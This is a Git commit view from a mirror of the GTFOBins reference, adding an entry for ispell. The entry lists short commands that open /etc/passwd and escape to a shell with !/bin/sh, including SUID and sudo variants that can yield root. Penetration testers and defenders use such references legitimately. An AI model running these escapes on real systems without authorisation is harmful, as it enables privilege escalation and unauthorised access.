mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-02-23 02:33:13 +01:00
parent
1ab481cbd0
commit
50ab4f0ce0
15
_gtfobins/ispell.md
Normal file
15
_gtfobins/ispell.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
shell:
|
||||
- code: |
|
||||
ispell /etc/passwd
|
||||
!/bin/sh
|
||||
suid:
|
||||
- code: |
|
||||
./ispell /etc/passwd
|
||||
!/bin/sh -p
|
||||
sudo:
|
||||
- code: |
|
||||
sudo ispell /etc/passwd
|
||||
!/bin/sh
|
||||
---
|
Loading…
Reference in New Issue
Block a user